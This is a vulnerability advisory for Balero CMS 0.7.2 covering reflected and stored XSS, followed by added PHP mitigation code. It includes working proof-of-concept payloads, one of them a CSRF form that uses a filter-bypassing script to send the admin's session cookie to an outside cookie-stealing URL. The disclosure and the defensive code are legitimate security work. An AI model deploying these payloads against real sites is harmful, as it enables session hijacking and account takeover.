<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


CSRF + stored XSS + filter bypass + session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned</textarea><s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
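
The server-side controls that address the two findings above (the reflected 'counter' cookie and the stored 'content' field reachable through a cross-site POST), as an added example that is not part of the advisory and is not Balero CMS code. All function names, the `csrf` field and the sample input are hypothetical and constructed for illustration; PHP 7 or later is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not Balero CMS code: typed cookie parsing,
// context-aware output encoding, and a per-session CSRF token.

/** Parse the 'counter' cookie as a non-negative integer; anything else becomes 0. */
function read_counter(array $cookies): int
{
    $value = filter_var($cookies['counter'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    return $value === false ? 0 : $value;
}

/** Encode a string for HTML text and attribute contexts, including inside <textarea>. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Create (once) and return the token the site embeds in its own admin forms. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

/** Constant-time comparison of the submitted token against the session's token. */
function csrf_ok(array $session, array $post): bool
{
    return isset($session['csrf'], $post['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Constructed sample input shaped like the advisory's two cases.
$cookies = ['counter' => "1<script>confirm('XSS')</script>"];
$post    = ['title' => 'ZSL', 'content' => 'pwned</textarea><script>alert(1)</script>'];
$session = [];
$token   = csrf_token($session);

echo read_counter($cookies), "\n";                       // non-integer cookie is never echoed back
echo '<textarea>', e($post['content']), "</textarea>\n"; // stored markup is rendered as inert text
var_dump(csrf_ok($session, $post));                      // cross-site POST carries no token
var_dump(csrf_ok($session, $post + ['csrf' => $token])); // POST from the site's own form
```

Encoding at output time is what makes blacklist bypasses such as the split `s\cript` tag irrelevant, because no markup survives rendering regardless of how it is spelled. Marking the session cookie HttpOnly additionally keeps it out of reach of `document.cookie`.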